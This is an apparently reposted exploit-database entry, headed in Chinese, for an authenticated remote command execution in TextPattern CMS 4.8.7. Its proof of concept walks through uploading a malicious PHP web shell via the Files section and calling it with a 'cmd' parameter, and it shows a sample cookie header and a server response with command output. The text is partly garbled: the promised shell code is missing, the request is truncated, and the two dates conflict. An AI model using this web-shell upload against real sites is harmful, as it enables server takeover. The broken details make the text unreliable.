TextPattern CMS 4.8.7 - 远程命令执行 (Authenticated) 漏洞概述 EDB-ID: 49996 作者: Mert Das (mertpreter@gmail.com) 类型: Webapps 平台: PHP 日期: 2021-06-14 漏洞应用: TextPattern CMS 4.8.7 影响范围 受影响版本: TextPattern CMS 4.8.7 测试环境: Xampp 修复方案 软件链接: TextPattern CMS 官方网站: TextPattern POC代码 ```php Exploit Title : TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated) Date : 2021/09/06 Exploit Author : Mert Das mertpreter@gmail.com Software Link : https://textpattern.com/file_download/113/textpattern-4.8.7.zip Software web : https://textpattern.com/ Tested on: Server : Xampp First of all we should use file upload section to upload our shell. Our shell contains this malicious code: 1) Go to content section - 2) Click Files and upload malicious php file. 3) go to yourserver/textpattern/files/yourphp.php?cmd=yourcode; After upload our file our request and response is like below : Cookie: tap_login_public=18e9b4f4a21adm1n; language=en-gb; currency=GBP; PHPSESSID=cctbu6sj8571j276vp7g8ab7gi Upgrade-Insecure-Requests: 1 Response: HTTP/1.1 200 OK Date: Thu, 10 Jun 2021 00:32:41 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20 X-Powered-By: PHP/7.4.20 Content-Length: 22 Connection: close Content-Type: text/html; charset=UTF-8 pc\merdas